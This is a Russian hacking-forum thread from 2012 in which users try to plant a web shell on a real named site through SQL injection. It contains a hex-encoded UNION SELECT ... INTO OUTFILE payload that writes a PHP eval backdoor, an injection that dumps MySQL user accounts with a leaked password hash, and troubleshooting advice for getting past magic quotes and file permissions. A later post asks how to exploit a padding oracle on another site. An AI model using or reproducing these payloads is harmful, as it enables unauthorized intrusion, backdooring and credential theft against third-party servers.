 |
|
02.03.2012, 12:08
|
|
Новичок
Регистрация: 20.02.2012
Сообщений: 13
С нами:
7487606
Репутация:
0
|
|
Сообщение от Expl0ited
линку в личку
, можно как-то шелл залить на тот сайт?
|
|
|
02.03.2012, 16:06
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Подскажите как залить шелл, пробую так
Сообщение от None
http://k5.ru/m/all.php?id=12+limit+0,0+union+select+1,0x20273c3f7 06870206576616c286261736536345f6465636f646528245f5 24551554553545b636d645d29293b203f3e2720696e746f206 f757466696c6520272f7573722f6c6f63616c2f61706163686 5322f6874646f63732f6d2f7368656c6c2e706870272d2d,3--+
и не выходит, я может чтото делаю неправильно? |
|
|
|
02.03.2012, 17:25
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от qaz
Подскажите как залить шелл, пробую так
и не выходит, я может чтото делаю неправильно?
Наверное, поэтому
http://k5.ru/m/all.php?id=12+and+1=0+union+select+1,(select(@x)fr om(select(@x:=0x00),(select(0)from(mysql.user)wher e(0x00)in(@x:=concat(@x,0x3c62723e,Host,0x3a,User, 0x3a,Password,0x3a,File_priv))))x),3+from+mysql.us er+--+
localhost:forks::Y
77.95.129.68:forks:*C232C307193E6E1B4C30CCD5017F10 EFC0CBD5FD:Y
|
|
|
|
02.03.2012, 17:27
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от qaz
Подскажите как залить шелл, пробую так
и не выходит, я может чтото делаю неправильно?
Если MySQL сервер работает под mysql то он скорее всего не будет иметь права для записи в www директорию http сервера. Максимально создаст файл в /var/lib/mysql/, а www сервер уж точно не будет запускать скрипти оттуда.
|
|
|
|
02.03.2012, 17:33
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от er9j6@
Наверное, поэтому
http://k5.ru/m/all.php?id=12+and+1=0+union+select+1,(select(@x)fr om(select(@x:=0x00),(select(0)from(mysql.user)wher e(0x00)in(@x:=concat(@x,0x3c62723e,Host,0x3a,User, 0x3a,Password,0x3a,File_priv))))x),3+from+mysql.us er+--+
localhost:forks::Y
77.95.129.68:forks:*C232C307193E6E1B4C30CCD5017F10 EFC0CBD5FD:Y
а я не шарю что ето значит, подскажи
|
|
|
|
02.03.2012, 17:36
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от qaz
а я не шарю что ето значит, подскажи
ну, это значит что подключение к бд разрешено с определенных хостов
|
|
|
|
02.03.2012, 17:38
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от R0nin
Если MySQL сервер работает под mysql то он скорее всего не будет иметь права для записи в www директорию http сервера. Максимально создаст файл в
/var/lib/mysql/
, а www сервер уж точно не будет запускать скрипти оттуда.
он будет иметь право для запеси в папки с правами 777, т.е где разрешены запеси для всех групп.
|
|
|
|
02.03.2012, 17:39
|
|
Новичок
Регистрация: 19.06.2008
Сообщений: 12
С нами:
9418698
Репутация:
1
|
|
Приветствую.
Сканил Acunetix'ом один ресурс и он выдал мне следующее:
Сообщение от None
Acunetix detected this (ASP.NET Padding Oracle Vulnerability) vulnerability by comparing the HTTP response status and body for two different requests (one request when the padding is incorrect and another one where the encrypted text is not valid). If the body AND/OR status are different, this vulnerability can be exploited.
First request: Status code 404 Response body (first 500 bytes) ################ #### ############## (404) QRATOR HTTP 503 - application is too busy right now. ...
И приводит запрос, который выдает 404 и 503 ошибку. Я пытался его воспроизвести, но у меня получилась только 404 ошибка.
Сообщение от None
GET /WebResource.axd HTTP/1.1
Cookie: ASP.NET_SessionId=jqvbmouzqvyyng4534ofwa55
Host: ***.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
503-ю воспроизвести не могу. И интересует такой вопрос: насколько реально будет эксплуатировать данную уязвимость? Если вообще реально. Спасибо. |
|
|
|
02.03.2012, 17:39
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от qaz
Подскажите как залить шелл, пробую так
и не выходит, я может чтото делаю неправильно?
1. там mq=on. Это делает невозможным заливку, потому что железно нужны кавычки.
2. нельзя переводить в хекс методы, операторы и т.п.
|
|
|
|
02.03.2012, 17:55
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами:
7604246
Репутация:
55
|
|
Сообщение от None
Если MySQL сервер работает под mysql то он скорее всего не будет иметь права для записи в www директорию http сервера. Максимально создаст файл в /var/lib/mysql/, а www сервер уж точно не будет запускать скрипти оттуда.
реально бред
Сообщение от None
ну, это значит что подключение к бд разрешено с определенных хостов
это тоже значение не имеет, к бд обращается сам скрипт, уж у него права на подключение есть
Melfis верно сказал Двойного запроса там тоже не видно, нужно другой способ искать, благо читалка там есть
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
